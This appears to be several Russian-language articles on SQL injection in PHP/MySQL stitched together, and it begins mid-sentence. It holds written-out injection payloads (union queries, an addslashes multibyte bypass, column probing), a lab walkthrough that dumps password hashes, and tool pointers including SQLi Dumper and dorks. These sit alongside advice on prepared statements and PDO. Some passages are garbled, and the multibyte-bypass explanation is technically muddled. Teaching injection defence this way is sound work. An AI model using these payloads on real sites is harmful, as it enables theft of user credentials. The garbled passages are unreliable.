Вероятно, такой запрос вернет нам логин пользователя и... хеш от его пароля. Первая часть запроса `AND 1=0` превращает то, что перед ним в false, соответственно никаких записей не будет получено. А вторая часть запроса вернет данные в виде prepared data. А так как первым параметром идет id, следующим будет логин пользователя и хеш его пароля и еще сколько-то параметров. Существует множество программ, с помощью брутфорса декодирующих такой пароль, как в примере. А так как пользователь может использовать один и тот же пароль для разных сервисов, можно получить доступ и к ним.
И вот что любопытно: от такого способа атаки совершенно невозможно защититься методами вроде `mysql_real_escape_string`, `addslashes` и.т. д. В принципе, нет способа избежать такой атаки, поэтому, если параметры будут передаваться так:
"SELECT id, login, email, param1 FROM users WHERE id = " . addslashes($_GET["id"]);"
проблемы не исчезнут.
Экранирование символов в строке
Когда я был новичком в программировании, мне было тяжело работать с кодировками. Я не понимал, в чем между ними различие, зачем использовать UTF-8, когда нужно UTF-16, почему база данных постоянно устанавливает кодировку в latin1. Когда я наконец начал всё это понимать, то обнаружил, что проблем станет меньше, если хранить всё в одном стандарте кодирования. Разбираясь со всем этим, я заметил также и проблемы безопасности, возникающие при преобразовании из одной кодировки в другую.
Проблем, описанных в большинстве предыдущих примеров, можно избежать, используя одинарные кавычки в запросах. Если вы используете addslashes() , атаки через SQL-инъекции, построенные на использовании одинарных кавычек, экранируемых обратным слэшем, потерпят неудачу. Но такая атака может пройти, если просто подставить символ с кодом 0xbf27 , addslashes() преобразует его в символ с кодом 0xbf5c27 - а это вполне валидный символ одинарной кавычки. Другими словами, `뼧` пройдет через addslashes() , а потом маппинг MySQL конвертирует его в два символа 0xbf (¿) и 0x27 (‘).
"SELECT * FROM users WHERE login = ""; . addslashes($_GET["login"]) . ";"";
Этот пример можно хакнуть, передав 뼧 or 1=1; -- в поле логина в форме. Движок SQL сгенерит конечный запрос так:
SELECT * FROM users WHERE login = "¿" OR 1=1; --
И вернет первого пользователя из БД.
Защита
Как же защитить приложение? Есть куча способов, применение которых не сделает приложение совсем неуязвимым, но хотя бы повысит его защищенность.
Использование mysql_real_escape_string
Функция addslashes() ненадежна, так как не предусматривает многие случаи взлома. У mysql_real_escape_string нет таких проблем
Использование MySQLi
Это расширение для MySQL умеет работать со связанными параметрами:
$stmt = $db->prepare("update uets set parameter = ? where id = ?"); $stmt->bind_param("si", $name, $id); $stmt->execute();
Использование PDO
Длинный способ подстановки параметров:
$dbh = new PDO("mysql:dbname=testdb;host=127.0.0.1", $user, $password); $stmt = $dbh->prepare("INSERT INTO REGISTRY (name, value) VALUES (:name, :value)"); $stmt->bindParam(":name", $name); $stmt->bindParam(":value", $value); // insert one row $name = "one"; $value = 1; $stmt->execute();
Короткий способ:
$dbh = new PDO("mysql:dbname=testdb;host=127.0.0.1", $user, $password); $stmt = $dbh->prepare("UPDATE people SET name = :new_name WHERE id = :id"); $stmt->execute(array("new_name" => $name, "id" => $id));
Использование ORM
Используйте ORM и PDO и связывайте (используйте bind) параметры. Избегайте SQL в коде, если вы видите в коде SQL, значит, с ним что-то не так.
ORM позаботится о безопасности в самых узких местах в коде и о валидации параметров.
Выводы
Цель этой серии не предоставить полное руководство по взлому сайтов, а обеспечить безопасность приложения и предотвращение атак из любого источника. Я постарался написать эту статью не только для программистов — они должны быть в курсе любых угроз в коде и знать пути, как предотвратить их, но также и для инженеров по качеству — потому, что их работа заключается в том, чтобы отследить и сообщить такие моменты.
Хотя по-прежнему очевидно, что взломщик должен обладать по крайней мере некоторыми знаниями о структуре базы данных чтобы провести успешную атаку, получить эту информацию зачастую очень просто. Например, если база данных является частью open-source или другого публично доступного программного пакета с инсталляцией по умолчанию, эта информация является полностью открытой и доступной. Эти данные также могут быть получены из закрытого проекта, даже если он закодирован, усложнен, или скомпилирован, и даже из вашего личного кода через отображение сообщений об ошибках. К другим методам относится использование распространенных (легко угадываемых) названий таблиц и столбцов. Например, форма логина, которая использует таблицу "users" c названиями столбцов "id", "username" и "password".
Большинство успешных атак основывается на коде, написанном без учета соответствующих требований безопасности. Не доверяйте никаким вводимым данным, особенно если они поступают со стороны клиента, даже если это списки в форме, скрытые поля или куки. Первый приведенный пример показывают, как подобные запросы могут привести к катастрофе.
- Никогда не соединяйтесь с базой данных, используя учетную запись владельца базы данных или суперпользователя. Всегда старайтесь использовать специально созданных пользователей с максимально ограниченными правами.
- используйте подготовленные выражения с привязанными переменными. Эта возможность предоставляется расширениями PDO , MySQLi и другими библиотеками.
- Всегда проверяйте введенные данные на соответствие ожидаемому типу. В PHP есть множество функций для проверки данных: начиная от простейших функций для работы с переменными и функций определения типа символов (таких как is_numeric() и ctype_digit() соответственно) и заканчивая Perl-совместимыми регулярными выражениями .
- Если на уровне базы данных не поддерживаются привязанные переменные, то всегда экранируйте любые нечисловые данные, используемый в запросах к БД при помощи специальных экранирующих функций, специфичных для используемой вами базы данных (например, mysql_real_escape_string() , sqlite_escape_string() и т.д.). Общие функции такие как addslashes() полезны только в определенных случаях (например MySQL в однобайтной кодировке с отключенным NO_BACKSLASH_ESCAPES), поэтому лучше избегать их использование.
- Ни в коем случае не выводите никакой информации о БД, особенно о ее структуре. Также ознакомьтесь с соответствующими разделами документации: "Сообщения об ошибках " и "Функции обработки и логирования ошибок ".
- Вы можете использовать хранимые процедуры и заранее определенные курсоры для абстрагированной работы с данными, не предоставляя пользователям прямого доступа к данным и представлениям, но это решение имеет свои особенности.
В случае, если приложение ожидает цифровой ввод, примените функцию ctype_digit() для проверки введенных данных, или принудительно укажите их тип при помощи settype() , или просто используйте числовое представление при помощи функции sprintf() .
Пример #5 Более безопасная реализация постраничной навигации
settype
($offset
,
"integer"
);
$query
=
"SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET
$offset
;"
;
// обратите внимание на формат %d, использование %s было бы бессмысленно
$query
=
sprintf
("SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET %d;"
,
$offset
);
?>
Помимо всего вышесказанного, вы можете логировать запросы в вашем скрипте либо на уровне базы данных, если она это поддерживает. Очевидно, что логирование не может предотвратить нанесение ущерба, но может помочь при трассировке взломанного приложения. Лог-файл полезен не сам по себе, а информацией, которая в нем содержится. Причем, в большинстве случаев полезно логировать все возможные детали.
Количество сайтов и страничек в Сети неуклонно растёт. За разработку берутся все, кто только может. И начинающие веб-программисты очень часто используют небезопасный и старый код. А это создаёт массу лазеек для злоумышленников и хакеров. Чем они и пользуются. Одна из самых классических уязвимостей — SQL-инъекция.
Немного теории
Многие знают, что большинство сайтов и сервисов в сети используют для хранения базы SQL. Это такой язык структурированных запросов, который позволяет управлять и администрировать хранилища с данными. Известно много различных версий систем менеджмента базами данных — Oracle, MySQL, Postgre. Вне зависимости от имени и типа, они одинаково используют запросы к данным. Именно здесь и кроется потенциальная уязвимость. Если разработчик не смог правильно и безопасно обработать запрос, то злоумышленник может воспользоваться этим и применить особые тактики для получения доступа к базе, а оттуда - и к управлению всем сайтом.
Для избежания таких ситуаций нужно грамотно оптимизировать код и внимательно следить за тем, какой запрос каким способом обрабатывается.
Проверка на SQL-инъекции
Для установления наличия уязвимости в сети имеется масса готовых автоматизированных программных комплексов. Но можно осуществить простую проверку и вручную. Для этого нужно перейти на один из исследуемых сайтов и в адресной строке попробовать вызвать ошибку базы данных. К примеру, скрипт на сайте может не обрабатывать запросы и не обрезать их.
Например, есть некий_сайт/index.php?id=25
Самый лёгкий способ — поставить после 25 кавычку и отправить запрос. Если никакой ошибки не возникло, то либо на сайте фильтруются все запросы и правильно обрабатываются, либо в настройках отключён их вывод. Если страница перезагрузилась с проблемами, значит, уязвимость для SQL-инъекции есть.
После того как она обнаружена, можно пробовать избавиться от нее.
Для реализации данной уязвимости нужно знать немного о Одна из них — UNION. Она объединяет несколько результатов запроса в один. Так можно вычислить количество полей в таблице. Пример первого запроса выглядит так:
- некий_сайт/index.php?id=25 UNION SELECT 1.
В большинстве случаев такая запись должна выдать ошибку. Это значит, что количество полей не равно 1. Таким образом, подбирая варианты от 1 и больше, можно установить их точное число:
- некий_сайт/index.php?id=25 UNION SELECT 1,2,3,4,5,6.
То есть, когда ошибка перестанет появляться, значит, количество полей угадано.
Есть также и альтернативный вариант решения этой проблемы. Например, когда число полей большое — 30, 60 или 100. Это команда GROUP BY. Он группирует результаты запроса по какому-либо признаку, например id:
- некий_сайт/index.php?id=25 GROUP BY 5.
Если ошибок не было получено, значит, полей больше, чем 5. Таким образом, подставляя варианты из довольно обширного диапазона, можно вычислить, сколько же их на самом деле.
Данный пример SQL-инъекции - для новичков, которые хотят попробовать себя в тестировании своего сайта. Важно помнить, что за несанкционированный доступ к чужому имеется статья Уголовного кодекса.
Основные типы инъекций
Реализовать уязвимости посредством SQL-инъекции можно несколькими вариантами. Далее идут наиболее популярные методики:
UNION injection. Простой пример данного типа был уже рассмотрен выше. Реализуется он за счёт ошибки в проверке приходящих данных, которые никак не фильтруются.
Error-based SQL injection. Как понятно из названия, данный тип также использует ошибки, посылая выражения, составленные синтаксически неправильно. Затем происходит перехват заголовков ответа, анализируя которые, можно провести впоследствии SQL-инъекцию.
Stacked injection. Данная уязвимость определяется выполнением последовательных запросов. Характеризуется он присоединением в конце знака «;». Этот подход чаще реализуется для доступа к реализации чтения и записи данных или же управлением функциями операционной системы, если привилегии это позволяют.
Программные комплексы для поиска SQL-уязвимостей
Наличествующие для проведения SQL-инъекций, программы обычно имеют две составляющих — сканирование сайта на возможные уязвимости и их использование для получения доступа к данным. Существуют такие утилиты практически для всех известных платформ. Их функционал в значительной мере облегчает проверку сайта на возможность взлома SQL-инъекцией.
Sqlmap
Очень мощный сканер, работающий с большинством известных СУБД. Поддерживает различные методики внедрения SQL-инъекций. Имеет возможность автоматического распознавания типа хэша пароля и его взлома по словарю. Присутствует и функционал загрузки и выгрузки файлов с сервера.
Установка в среде Linux выполняется с помощью команд:
- git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev,
- cdsqlmap-dev/,
- ./sqlmap.py --wizard.
Для Windows имеется как вариант с командной строкой, так и с графическим интерфейсом пользователя.
jSQL Injection
jSQL Injection — кроссплатформенный инструмент для тестирования использования SQL уязвимостей. Написан на Java, поэтому в системе должен быть установлен JRE. Способен обрабатывать запросы header, cookie. Обладает удобным графическим интерфейсом.
Установка данного программного комплекса происходит так:
wget https://github.com/`curl -s https://github.com/ron190/jsql-injection/releases| grep-E -o "/ron190/jsql-injection/releases/download/v{1,2}.{1,2}/jsql-injection-v{1,2}.{1,2}.jar"| head-n 1`
Запуск осуществляется с помощью команды java -jar ./jsql-injection-v*.jar
Для того чтобы начать проверку сайта на SQL-уязвимость, нужно ввести его адрес в верхнее поле. Они есть отдельные для GET и для POST. При положительном результате в левом окне появится список доступных таблиц. Их можно просмотреть и узнать некую конфиденциальную информацию.
Для поиска административных панелей используется вкладка «Admin page». На ней с помощью специальных шаблонов выполняется автоматический поиск системных записей привилегированных пользователей. Из них можно получить всего лишь хэш пароля. Но и он имеется в инструментарии программы.
После нахождения всех уязвимостей и инъектирования нужных запросов, утилита позволит залить на сервер свой файл или же, наоборот, скачать его оттуда.
SQLi Dumper v.7
Данная программа — простой в использовании инструмент для поиска и реализации уязвимостей в SQL. Производит оон это на основе так называемых дорков. Их списки можно найти в интернете. Дорки для SQL-инъекций — это специальные шаблоны поисковых запросов. С их помощью можно найти потенциально через любой поисковик.
Инструменты для тренировки
На сайте itsecgames.com имеется специальный набор инструментария, который позволяет на примере показывает как сделать SQL инъекцию и протестировать ее. Для того чтобы воспользоваться, её нужно скачать и установить. Архив содержит в себе набор файлов, который представляет собой структуру сайта. Для его установки понадобится имеющийся в системе набор веб-сервера Apache, MySQL и PHP.
Распаковав архив в папку веб-сервера, надо перейти по адресу, введённому при установке данного программного продукта. Откроется страница с регистрацией пользователя. Здесь нужно ввести свои данные и нажать «Create». Переведя пользователя в новое окно, система предложит выбрать один из вариантов тестирования. Среди них имеется как описываемые инъекции, так и много других тестовых заданий.
Стоит рассмотреть пример SQL-инъекции типа GET/Search. Здесь нужно выбрать ее и нажать «Hack». Перед пользователем предстанет строка поиска и имитация некоего сайта с фильмами. Перебирать фильмы можно долго. Но их всего 10. К примеру, можно попробовать ввести Iron Man. Выведется фильм, значит, сайт работает, и таблицы в нем имеются. Теперь надо проверить, фильтрует ли скрипт особые символы, в частности кавычку. Для этого в строку адреса нужно добавить "». Причём, сделать это надо после названия фильма. Сайт выдаст ошибку Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near "%"" at line 1, которая гласит о том, что символы всё-таки обрабатываются неправильно. Значит, можно пробовать подставить свой запрос. Но нужно сначала вычислить количество полей. Для этого используется order by, который вводится после кавычки: http://testsites.com/sqli_1.php?title=Iron+Man" order by 2 --&action=search.
Данная команда просто выведет сведения о фильме, то есть количество полей больше 2. Двойной дефис сообщает серверу, что остальные запросы нужно отбросить. Теперь надо перебирать, подставляя все большие значения до тех пор, пока не выведется ошибка. В итоге получится, что полей будет 7.
Теперь настало время получить что-то полезное из базы. Придётся немного модифицировать запрос в адресной строке, приведя ее к такому виду: http://testsites.com/sqli_1.php?title=Iron+Man" union select 1, database(),user(),4,password,6,7 from users --&action=search. В результате её выполнения выведутся строки с хэшами паролей, которые можно легко превратить в понятные символы с помощью одного из онлайн сервисов. А немного поколдовав и подобрав имя поля с логином, можно получить доступ к чужой записи, например админа сайта.
В продукте имеется масса разновидностей типов инъекций, на которых можно попрактиковаться. Стоит помнить, что применение данных навыков в сети, на реальных сайтах может оказаться уголовно наказуемым.
Инъекции и PHP
Как правило, именно PHP-код и отвечает за необходимую обработку запросов, приходящих от пользователя. Поэтому именно на этом уровне нужно выстраивать защиту от SQL-инъекций в PHP.
- Данные всегда должны быть обработаны перед помещением в базу. Это можно реализовать либо используя уже имеющиеся выражения, либо организовывая запросы вручную. Здесь тоже стоит учитывать, что числовые значения преобразовываются к тому типу, который необходим;
- Избегать в запросе появления различных управляющих конструкций.
Теперь немного о правилах составления запросов в MySQL для защиты от SQL-инъекций.
При составлении каких-либо выражений для запроса важно отделять данные от ключевых слов SQL.
- SELECT * FROM table WHERE name = Zerg.
В данной конструкции система может подумать, что Zerg — это имя какого-либо поля, поэтому нужно заключить его в кавычки.
- SELECT * FROM table WHERE name = "Zerg".
Однако, бывают ситуации, когда значение само по себе содержит кавычки.
- SELECT * FROM table WHERE name = "кот-д"ивуар".
Здесь обработается только часть кот-д, а остальная может быть воспринята как команда, которой, естественно, нет. Поэтому возникнет ошибка. Значит нужно такого рода данные экранировать. Для этого используется обратный слэш - \.
- SELECT * FROM table WHERE name = "кот-д\"ивуар".
Все вышеперечисленное относится к строкам. Если действие происходит с числом, то ему не нужны ни кавычки ни слэши. Однако их надо обязательно в принудительном порядке приводить к необходимому типу данных.
Существует рекомендация, по которой имя поля должна быть заключена в обратную кавычку. Этот символ находится в левой части клавиатуры, вместе со знаком тильда «~». Это нужно для того, чтобы MySQL могла точно отличить имя поля от своего ключевого слова.
Динамическая работа с данными
Очень часто для получения каких-либо данных из базы используются запросы, сформированные динамически. Например:
- SELECT * FROM table WHERE number = "$number".
Здесь переменная $number передается в качестве определения значения поля. Что же будет, если в неё попадёт "кот-д"ивуар"? Ошибка.
Избежать данной неприятности, конечно, можно включив «волшебные кавычки» в настройках. Но теперь данные будут экранироваться там, где надо и не надо. К тому же если код пишется вручную, то можно потратить немного больше времени на то, чтобы создать стойкую к взлому систему самому.
Для самостоятельного добавления слэша можно использовать mysql_real_escape_string.
$number=mysql_real_escape_string($number);
$year=mysql_real_escape_string($year);
$query="INSERT INTO table (number,year,class) VALUES ("$number","$year",11)".
Хотя код и вырос в объеме, все же, потенциально он будет работать гораздо безопаснее.
Плейсхолдеры
Плейсхолдеры — своеобразные маркеры, по которым система узнает что в это место нужно подставить специальную функцию. Например:
$sate = $mysqli->prepare("SELECT District FROM Number WHERE Name=?");
$sate->bind_param("s", $number);
$sate->execute();
Данный участок кода производит подготовку шаблона запроса, затем привязывает переменную number, и выполняет его. Данный подход позволяет разделить обработку запроса и его реализацию. Таким образом, можно уберечься от использования внедрения вредоносного кода в SQL-запросы.
Что может сделать злоумышленник
Защита системы - очень важный фактор, которым нельзя пренебрегать. Конечно, простенький сайт-визитку будет проще восстановить. А если это большой портал, сервис, форум? Какие последствия могут быть, если не думать о безопасности?
Во-первых, хакер может нарушить как целостность базы, так и удалить её целиком. И если администратор сайта или хостер не сделали бэкап, то придётся несладко. Помимо всего, злоумышленник, взломав один сайт, может перейти на другие, размещённые на этом же сервере.
Далее идет хищение личных данных посетителей. Как их использовать — тут все ограничивается лишь фантазией хакера. Но в любом случае последствия будут не очень приятными. Тем более если содержалась финансовая информация.
Также злоумышленник может слить базу себе, а затем вымогать деньги за её возврат.
Дезинформация пользователей от имени лицом им не являющимся, также может нести негативные последствия, так как возможны факты мошенничества.
Заключение
Вся информация в данной статье предоставлена исключительно в ознакомительных целях. Использовать её нужно только для тестирования собственных проектов при обнаружении уязвимостей и их устранения.
Для более углублённого изучения методики того, как провести SQL-инъекцию, нужно начать собственно с исследования возможностей и особенностей языка SQL. Как составляются запросы, ключевые слова, типы данных и применение всего этого.
Также не обойтись без понимания работы функций PHP и элементов HTML. Основными уязвимыми точками для использования инъекций — адресная строка, поиск и различные поля. Изучение функций PHP, способ их реализации и возможности позволят понять, как можно избежать ошибок.
Наличие множества готовых программных инструментов позволяют провести глубокий анализ сайта на известные уязвимости. Один из наиболее популярных продуктов — kali linux. Это образ операционной системы на базе Linux, который содержит в себе большое количество утилит и программ, способных провести разносторонний анализ сайта на прочность.
Для чего нужно знать, как взломать сайт? Все очень просто — это надо для того, чтобы иметь представление о потенциально уязвимых местах своего проекта или сайта. Особенно если это какой-либо интернет-магазин с возможностью оплаты онлайн, где платёжные данные пользователя могут быть скомпрометированы злоумышленником.
Для профессионального исследования существуют службы информационной безопасности смогут проверить сайт по разным критериям и глубине. Начиная от простой HTML-инъекции и до социальной инженерии и фишинга.